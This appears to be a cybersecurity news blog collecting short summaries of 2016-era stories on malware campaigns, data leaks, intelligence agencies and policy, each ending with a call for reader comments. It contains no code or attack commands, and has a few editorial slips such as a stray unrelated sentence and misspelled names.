Can the US CIA Fight Cyber Terrorism Alone?

Featuring heavily are gadgets such as early secret cameras and bugging devices that would not appear out of character in a Hollywood film. The line-up makes the point that even though the CIA is an intelligence agency whose central mission has been to recruit people to provide secrets, technology has always had a crucial role. Andrew Hallman - who runs the recently created Directorate of Digital Innovation - has the job of making sure that the new digital world works to the CIA's advantage rather than disadvantage. A major focus of Mr Hallman's effort is to use data to provide insights into future crises - developing what has been called "anticipatory intelligence". This means looking for ways in which technology can provide early warning of, say, unrest in a country. "I think that's a big growth area for the intelligence community and one the Directorate of Digital Innovation is trying to promote," Mr Hallman says. The volume and variety of data produced around the world has grown exponentially in recent years - a process about to accelerate as more and more items as well as people are connected up in the so-called internet of things. Developing expertise in open-source (publicly available) information is another priority - in the past this was something of a sideshow at an agency that focused on "secrets" - but such information can often help focus on what really is secret and what can be obtained by other means, especially as the definition of open source expands rapidly from the past, when it largely meant foreign news and media.This writer believes that cyber terrorism can only be defeated by a strong partnership between the government and private sector. Share your thoughts with the Cloud and Cyber Security Center.

What are the Highest Risks Third-Party Apps Pose for the Enterprise?

Since the emergence of mobile computing there's been a rise in employees' use of third-party applications -- a rise that poses security risks to corporate environments. That is one of the findings in a report Cloudlock released last week. The number of third-party apps connected to corporate environments increased by 30 fold over the last two years, the firm reported, from 5,500 to 150,000 apps. CloudLock ranked more than a quarter of the apps found in business environments (27 percent) as "high risk," which means they were more likely than other apps to open pathways into an organization for cybercriminals. Companies have not ignored that danger, CloudMark's researchers also found. More than half of third-party apps were banned in many workplaces due to security-related concerns. CloudLock is a frictionless solution that is installed in minutes and protects cloud applications and provides codeless security for custom-built apps. From crowd-sourced security analytics across billions of data points to advanced machine learning, to the data scientist-led CyberLab, CloudLock provides actionable cybersecurity intelligence across an organization’s entire cloud infrastructure. What are the greatest risk that CSOs see since the pervasive use of third-party apps? Let us know your insights here at the Cloud and Cyber Security Center.

What is the Impact of BREXIT on Cyber Security?

The immediate response to the British decision to leave the European Union has sent the pound tumbling and raised suggestions that Britain is now a sitting target for cyber criminals. Let's start with the facts. Firstly, Britain is not yet leaving the EU. The referendum has only advisory status on the government, and only the government can choose to leave. That will require a majority vote in Parliament to invoke article 50 of the Treaty of Lisbon -- and that won't happen while David Cameron is prime minister. It is not guaranteed that Parliament will get that majority since the majority of MPs do not wish to leave. If and when article 50 is invoked it will start a two year period where both sides negotiate exit terms. During all of this period, the UK will remain a full member of the European Union. And it is in everyone's interest to reach an amicable and smooth exit. The primary security concerns revolve around General Data Protection Regulation (GDPR) issues, a loss of threat intelligence cooperation with Europe, an increasing cost of security (because of the falling value of the pound), and the loss of access to European technical expertise. Each one of these should be considered rationally. GDPR is likely to go ahead in the UK. Technically, it must go ahead since it will become law before the UK actually leaves the European Union. Practically, it will go ahead because it is the easiest way to maintain 'privacy adequacy' and continue easy trading between the UK and Europe. This immediately removes one of the big issues: there will be no need for US companies to move servers from London to The Hague simply to conform to GDPR. How will BREXIT impact cyber security in Great Brittan and the nations which remain in the EU? Share your comments with the Cloud and Cyber Security Center.

Banking Trojan "Marcher" Targets European Banks, GMail and PayPal

A threat offered on Russian underground forums since late 2013 known as "Marcher", currently retails for roughly $5,000. The malware initially focused on banks in Germany, but the list of targets was later expanded to include France, Poland, Turkey, the United States, Australia, Spain, Austria and others. IBM Security reported in early June that nine major banks in the UK had also been added to the list of targets. Samples analyzed by PhishLabs this month target the customers of 66 companies, including 62 banks, Google email services and PayPal. IBM reported earlier this month that the United States was the sixth most targeted country, but PhishLabs said on Thursday that the Marcher Samples  it has analyzed don’t target the U.S. “Because the malware can be customized for each individual actor, it is possible that other Marcher samples may include different targets and regions. Expanded targeting seems likely in future based upon this capability,” PhishLabs researchers explained. Depending on the cybercrime group that is using it, Marcher can be delivered via SMS messages, mobile adware, social media websites or spam emails. The newest samples analyzed by PhishLabs have been distributed as Adobe Flash Player installers. Similar to GM Bot and other Android banking Trojans, Marcher has been using custom overlay screens to steal information from victims. While the Trojan has mostly targeted banking applications, it’s also capable of stealing user data from airline, payment, e-commerce and direct marketing apps. How can this Russian malware be mitigated? Send your recommendations to the Cloud and Cyber Security Center:

Questions Raised About the Tactics Used By Edward Snowden to Inform the NSA

Edward Snowden made a greater effort than originally believed to raise his concerns within the NSA before releasing thousands of classified documents detailing programs that allowed the agency to spy on U.S. citizens. The truth is more complex than the NSA let on, according to Vice News, which reported on documents it secured through two years of Freedom of Information Act litigation. In the aftermath of Snowden's release of a cache of stolen NSA documents, he claimed that he had exhausted all official avenues available to him before going public. "I had reported these clearly problematic programs to more than 10 distinct officials, none of whom took any action to address them," he said in testimony before the European Parliament in March 2014. However, the NSA maintained then and still maintains that it could find only one email message from Snowden that touched on the subject. Snowden did much more than send a single email warning, Vice found.
He had an in-person interaction with one of the people who responded to his email, for example. The NSA, the administration and Sen. Dianne Feinstein, D-Calif., all made efforts to discredit him, the  FOIA documents revealed. Snowden stated "There is a general culture of suppressing dissent in these institutions. Whistle-blowers are needed because there's a lack of oversight and accountability -- particularly of intelligence agencies." Where does the US draw the line between legal and illegal release of sensitive materials obtained under FOIA? Share your assessment with the Cloud and Cyber Security Center.

Tor Implements Improved Anonymity Protection - How Secure is Tor Now?

Tor has been long focused on improving its security features to ensure users benefit from the privacy levels they are looking for, many have been trying to crack these security measures in an attempt to locate users. The FBI, for example, has been abusing bugs in the underlying Firefox browser to compromise the anonymity of Tor users, but that might no longer be possible soon. Researchers from the University of California, Irvine (UCI), say that an enhanced and practical load-time randomization technique can be used in Tor to defend against exploits. Called Selfrando, the solution should improve security over standard address space layout randomization (ASLR) techniques employed by Firefox and other mainstream browsers at the moment. “We collaborated closely with the Tor Project to ensure that selfrando is fully compatible with AddressSanitizer (ASan), a compiler feature to detect memory corruption. ASan is used in a hardened version of Tor Browser for test purposes. The Tor Project decided to include our solution in the hardened releases of the Tor Browser, which is currently undergoing field testing,” the security researchers say. According to them, Selfrando is meant to counter code reuse exploits, which involve an attacker trying to exploit a memory leak to reuse code libraries that already exist in the browser. The exploit allows an attacker to rearrange code in the application’s memory to have the malware up and running. Will these security enhancements prove to strengthen Tor's anonymity shortcomings? Share your comments with the Cloud and Cyber Security Center.

Microsoft's Application Cross-Site Scripting Security Vulnerabilities and Mitigation Tactics

Computer memory corruption issues are very common these days, with stack overflows, heap overflows and integer overflows being some examples of subcategories of these. Vulnerabilities that are classified as remote code execution or arbitrary code execution issues are often rated most critical, because if an attacker is able to run executables, he may be able to take complete control of a computer. That means he can access all the data (and change, delete or expose it), but the problem is bigger than that. If he gains administrative privileges, he can change permissions on files, add or remove other users from the admin group (or create new user accounts and delete other accounts altogether), change the configuration settings and even use the machine to bring down the network. Escalation of privilege vulnerabilities are often exploited in conjunction with RCE flaws, then, to gain that admin access. Web browsers are one of the most commonly exploited applications, because unlike many applications, they are used by practically everybody who uses the Internet. Almost everyone has multiple web browsers installed on our machines and most of us use one every day. It’s no wonder the browser is a favorite target of attackers who hunt down flaw that they can leverage to do their dirty work, and a top focus for security researchers who seek to find and report vulnerabilities so they can be patched before exploits occur “in the wild.” In 2014, the number of web browser vulnerabilities increased sharply. Cross-site scripting (XSS) flaws are a common type of vulnerability that’s often found in web applications.How can business and personal computer users mitigate against XXS scripting flaws? Share your recommendations with the Cloud and Cyber Security Center .

Estonian Man Pleads Guilty for Stealing US Goverment and Military Personnel Records

A 20-year-old Estonia man has pleaded guilty to stealing data on more than 1,300 U.S. military and government personnel and providing it to the Islamic State. When Windows 10 gets wonky, there's a whole set of activities to try and set things right. If   Ardit Ferizi’s goal was to “incite terrorist attacks,” the U.S. Department of Justice stated Wednesday. Ferizi once led a hacking group called Kosova Hacker’s Security, or KHS, which claims to have defaced over 20,000 websites. Last June he hacked into a U.S. Internet hosting company to steal the personnel data, which included addresses, telephone numbers and email logins. Ferizi used an online account with the name “KHS”, which led the FBI to suspect his involvement. He also neglected to cover his tracks. When the FBI examined the hacked server, they found the IP address Ferizi had used to carry out his attack. The same IP address had been used to access his Facebook and Twitter accounts.  He was arrested in Malaysia last year and extradited to the U.S. for trial. He faces a maximum 25 years in prison. The data he stole was passed to an ISIS member named Junaid Hussain, also a hacker. Hussain was later killed in an airstrike in Syria. It's not the only time Ferizi supplied information to ISIS. Last April, he provided data on dozens of U.S., British and French citizens, by sending screenshots of their credit card information.  The DOJ called it the first case of its kind.Are their other data thieves seeking to obtain similar data about other US government or military sources? Offer your comments here at the Cloud and Cyber Security Center.

IBM Releases its Annual Cost of Data Breach Report - Seven Disturbing Trends

IBM has studied the data breach experiences of more than 2,000 organizations for some 11 years, the research has revealed the following seven megatrends: 1) Data breaches are now a consistent cost of doing business in the era of cybercrime. The evidence showed that this is a permanent risk organizations need to be prepared to deal with. It needs to be incorporated into data protection strategies, 2) The biggest financial consequence to organizations that experienced a data breach is lost business. Following a breach, enterprises need to take steps to retain customers’ trust to reduce the long-term financial impact, 3) Most data breaches continue to be caused by criminal and malicious attacks. These breaches also take the most time to detect and contain. As a result, they have the highest cost per record, 4) Organizations recognize that the longer it takes to detect and contain a data breach, the more costly it becomes to resolve. Over the years, detection and escalation costs in our research have increased. This suggests investments are being made in technologies and in-house expertise to reduce the time to detect and contain a threat, 5) Highly regulated industries such as financial services and healthcare have the most costly data breaches because of fines and the higher-than-average rate of lost business and customers, 6) Improvements in data governance initiatives will reduce the cost of data breach. Incident response plans, the appointment of a CISO, employee training and awareness programs and a business continuity management strategy result in cost savings, and 7) Investments in certain data loss prevention controls and activities such as encryption and endpoint security solutions are important for preventing data breaches. Which data breaches would have the biggest effect on your organization? Share your anonymous comments with the Cloud and Cyber Security Center.

Introducing the FBI's Cyber Shield Allinace Program - Defend and Mitigate Cyber Threats

Cyber Shield Alliance (CSA) is an FBI cyber security partnership initiative developed by law enforcement for law enforcement to proactively defend and counter cyber threats against law enforcement networks and critical technologies. CSA encourages law enforcement participation as a force multiplier in defending our national security, while equipping agencies with the training and tools to optimize and defend their own law enforcement networks. CSA was launched by the FBI Cyber Division as an initiative with the dual responsibility of preventing harm to national security and enforcing federal laws. These two roles are complementary to each other, as threats to the nation’s cyber-security can emanate from nation-states, terrorist organizations, and from transnational criminal enterprises; with the lines between often blurred. Accomplishment of our mission is enhanced by the FBI’s long standing partnerships and joint efforts with the U.S. Intelligence Community and homeland security enterprise. Through these endeavors, the FBI stewards an array of FBI cyber-security resources and intelligence, much of which is accessible to SLTT law enforcement agencies through participation with the Cyber Shield Alliance. The importance of a unified front to defend and counter these cyber threats can’t be underestimated. State, local, territorial, and tribal (SLTT) agencies are the first line of defense for U.S. citizens against physical threats and emergencies. Attempts to infiltrate or immobilize these agencies’ information systems harms the communities’ law enforcement agencies are sworn to protect, with potentially devastating consequences. Previous attacks have resulted in the theft of highly sensitive information such as operation plans, case files, witness information, and workforce private identifying information.Will this alliance bear fruit by preventing new cyber threats? Send your comments to the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/

Can A Cybersecurity Agreement Be Reached Between the US and China?

Two countries - different leadership, different goals. Chinese and American officials said Tuesday they're committed to bridging their differences on cybersecurity and moving to implement recent agreements, as they held talks amid complaints over China-based hacking operations that the U.S. says may have already cost U.S. companies tens of billions of dollars. Repeated meetings between the sides on cybersecurity indicate the seriousness with which the Obama administration regards the issue, the U.S. ambassador to China, Max Baucus indicated at the start of the two-day talks in western Beijing. U.S. officials have been particularly eager to build on an agreement forged during Chinese President Xi Jinping's visit to the White House last September that says neither government will support commercial cyber-theft. The deal was viewed by Washington as a diplomatic breakthrough, although U.S. officials have not conclusively determined that it has led to a decline in hacks against U.S. companies. "We're here today to ensure implementation of agreements made by the two presidents, commitments that illustrate that we can work through areas of differences to reach areas of cooperation," Baucus said, referring to the agreement, which he called a "major advancement."  Can a meaningful agreement be reached or is this an exercise in futility knowing China's deep-rooted cyber strategies? Share your comments with the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/

How Can the Russian Hacker Tessa88@exploit.im Be Stopped?

The hacker known as Tessa88@exploit.im last month released 117m Linked in passwords and another 487m MySpace passwords. This week the same hacker made available a further 100 million password credentials stolen from Russian social media site VK. He claims to have a further 70 million accounts but is not yet releasing the remainder. The VK details were obtained some time between 2011 and 2013, and would consequently seem to represent almost all VK members at the time. It is likely that this happened while the organization was still headed by founder Pavel Durov. In 2014, under pressure from a Kremlin Internet enforcement effort he sold his shares to the Mail.ru group and left Russia; later founding the encrypted chat app Telegram. At the time of writing, Durov has made no comment about the VK leak on his Twitter account. The hacker is selling the database on the dark web site The real Deal for just 1 bitcoin (currently just under $600). He asked for 5 bitcoins for his LinkedIn dataset – suggesting that criminals would consider LinkedIn users potentially more valuable than VK users. Public news of the leak first appeared on LeakedSource,  a repository of hacked credentials. LeakedSource says that the database was "provided to us by a user who goes by the alias 'Tessa88@exploit.im'" It says nothing about how the hacker might have obtained the details, but just adds, "This data set contains 100,544,934 records. Each record may contain an email address, a first and last name, a location (usually city), a phone number, a visible password, and sometimes a second email address." What will the Tessa88@exploit.im target next? Send your predictions to the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/

How Effective are Treadstone 71's Cyber Intelligence Services?

Treadstone 71 Reporting and Briefs Service answers their clients and the client’s stakeholders key questions. They deliver new insights and further your understanding of the issues. Treadstone's services clearly and accurately present all forces and dynamics at play while articulating a clear line of analysis. Moreover, they provide sufficient reasoning and compelling evidence that supports our judgments including source credibility and confidence levels. The firm also provide alternative explanations and identify important contrary evidence and intelligence gaps. Treadstone's reporting and briefs service does not create marketing documents. Treadstone does not attempt to upsell you or sell you technology. Our interest is in your success. You may not always like what you see and read. That is how intelligence works. From warning intelligence and briefs to adversary dossiers and platforms. Treadstone 71 provides is a full-spectrum solution that takes the information you provide in your SOC and incident response functions combining that with complete political, economic, social, technological, environmental, legislative, industrial, educational, and religious aspects of the adversary as well as adversary dossiers and organizational structures. What you receive from Treadstone 71 is detailed information and intelligence on your adversary that far surpasses the technical realm. How valuable is the Treadstone 71 Reporting and Briefs service be to your security SOC? Share your assessment with our readers here at the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/

Cybercriminals Use Windows BITS to Download Malware to Unsuspecting Hosts

A Windows features that has been long abused by cybercriminals is the Windows Background Intelligent Transfer Service (BITS), and researchers warn that a lesser-known capability in BITS is now leveraged to download malware. BITS was designed as a native, reliable file transfer capability for Windows that uses idle network bandwidth. It is the functionality used to deliver operating system updates, but it is also employed to handle file transfers in some third-party applications. For over a decade, malware authors have been using BITS for illegal purposes,   including malware downloads and uploads, the launch of arbitrary applications, or the creation of long-lasting tasks. Now, researchers with the SecureWorks Counter Threat Unit (CTU) indicate that a lesser-known capability meant to facilitate “notification” actions when jobs complete is now abused by cybercriminals. The feature allows malware authors to create the self-contained, download-and-execute BITS tasks that endure even after removing the initial malware from the affected system. Researchers have identified active malicious BITS jobs created with the purpose of downloading and executing new malware and explain that these poisoned BITS tasks spawned installation and clean-up scripts after downloading their payloads. Self-contained in the BITS job database, these tasks eliminated the need of malicious files or registry modifications on the host, thus evading detection. Which mitigation measures will be most effective in preventing BITS malware attacks? Send your recommendations to the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/

Russian Police Arrest 50 Hackers for Bank Fraud Using the Lurk Trojan

Russian law enforcement officers have arrested 50 hackers across the country involved in bank fraud using the Lurk trojan, following 86 raids in 15 regions. Fourteen main participants including the three primary organizers were arrested in the Sverdlovsk region. An estimated $45 million has been stolen by the gang, while a further $30 million loss has been prevented by the police. The investigation of the Lurk banking trojan gang was assisted by Kaspersky Lab. The hackers had been stealing money from bank accounts in Russia and other countries of the CIS through use of the malicious software known as Lurk. Lurk is an Android trojan that mimics the online banking app for Sberbank, Russia's largest bank. "It displays a similar login screen to the original app and steals user credentials as soon as the victim tries to authenticate," reports Zscaler in an analysis published on the same day as the arrests. It can also steal SMS messages and monitor incoming calls in order to defeat one-time passwords and PINs sent by banks as a second authentication factor. Once Lurk has been installed it is difficult to detect or remove. Visually there is no difference between the Sberbank app and the Lurk trojan. Technically it is difficult to detect because it resides in memory. As a result, it is not possible to uninstall this malicious app by revoking admin rights." How large of a threat is the Lurk trojan to the banking sector in western Europe and the US? Share your assessment with the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/

How Effective Can Law Enforcement Be in Clamping Down on Phishing Web Sites?

It is well documented that “spam” – and the malware that comes with it – is big business. Security experts estimate that a successful spam (unwanted commercial email) campaign can produce anywhere from $400,000 to $1 million in revenue for a criminal enterprise. The Messaging Malware Mobile Anti-Abuse Working Group (M3AAWG) found that during a 30-month period from January 2012 to June 2014abusive email (spam, virus-infected messages and the like) accounted for 87.1% to 90.2% of the world’s email traffic. The M3AAWG report covered more than 400 million inboxes worldwide. Spammers, according to NW3C Computer Crime Specialist Jeremiah Johnson, have two primary goals: committing fraud and distributing malware. Once executed, malware increases the number of botnets available to spread even more spam or to mount attacks on secure networks. Malware most commonly comes in the form of executable files either delivered through spam emails or hidden behind clickable images or links on websites. Malware infects a machine and allows remote users to take over the system, rendering the machine part of a botnet. Botnet masters (crooks or criminal collectives that control various zombie computer networks) will lease their drones to the highest bidders. Understanding the connection between spam and cybercrime, and understanding why malware-distributing, or “phishing” sites, are such lucrative criminal tools, can help law enforcement track down criminal networks and shut down harmful operations, Johnson said. It is important that more investigators understand how websites are being targeted to host “phishing” kits to lure unsuspecting victims into giving out their personal information, he explained. How effective can the M3AAWG and law enforcement be in combating malware? Send your comments to the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/

Apple’s iOS Vulnerability Disclosed by Mi3 Security

Apple has not fixed a vulnerability which could allow attackers to replace regular apps with rogue versions without the user’s knowledge. Chilik Tamir from security vendor Mi3 Security disclosed the malicious software at the Hack in the Box conference in Amsterdam last week and has been told by Cupertino that it is working on a patch, although so far none has been forthcoming, according to reports. Tamir demoed a similar attack at Black Hat Asia at the end of March. Using a self-built tool dubbed ‘Su-A-Cyder’ he showed how an attacker could replace legitimate apps developed with Xcode7 – an iOS IDE. Anyone can apparently get an Xcode7 developer’s certificate as long as they can produce an email address and Apple ID. If the malicious replacement app has the same bundle ID as the original it could be downloaded onto a victim’s device – allowing an attacker to carry out a potentially wide range of malicious activities without the user's knowledge Apple’s iOS 8.3 release blocked this attack route by preventing any app upgrades if the files don’t match. However, in Amsterdam last week, Tamir apparently showed a way to circumvent this mitigation with SandJacking – a new technique in which an attacker with access to a victim’s device initiates a back-up, then deletes the original app, before loading the malicious replacement and restoring the device from back-up. The new malicious app will require manual approval by the user but this is likely to be given as it will look identical to the original. Which mitigation tactics should CISOs and consumers alike take against this vulnerability? Share your comments with the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/

SecurityWeek CISO Forum June 1-2 at Half Moon Bay (USA)

SecurityWeek CISO Forum will take place at the beautiful Ritz-Carlton, Half Moon Bay just south of San Francisco. This invitation only, high level event will bring together security leaders to discuss, share and learn information security strategies. Select sessions include: The State of Endpoint Security, Are we at the dawn of an endpoint protection revolution, In-CISO-mnia - What Keeps Security Leaders up at Night?, Securing The Data Center, Maximizing the Value of Threat Intelligence, Playing Cyberwar Games to Win, Reporting Security and Risk Management to the Board.  Recent evidence has been found that shows a bank in the Philippines has been attacked by the group that stole US $81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam. Symantec researchers have identified three pieces of malware which were being used in limited targeted attacks against the financial industry. Symantec's Liam O'Murchu will share late breaking research and insights on these attacks. Zero-Day vulnerabilities are perhaps the number 1 priority for CISOs. “Trusted” insiders walking out the door with corporate secrets. These are just a few of the headaches today’s security leaders are faced with on a daily basis.  How valuable has the SecurityWeek CISO Forum been in equipping security professionals? Share your comments with the Cloud and Cyber Security Center: http://cloudandcybersecurity.blogspot.com/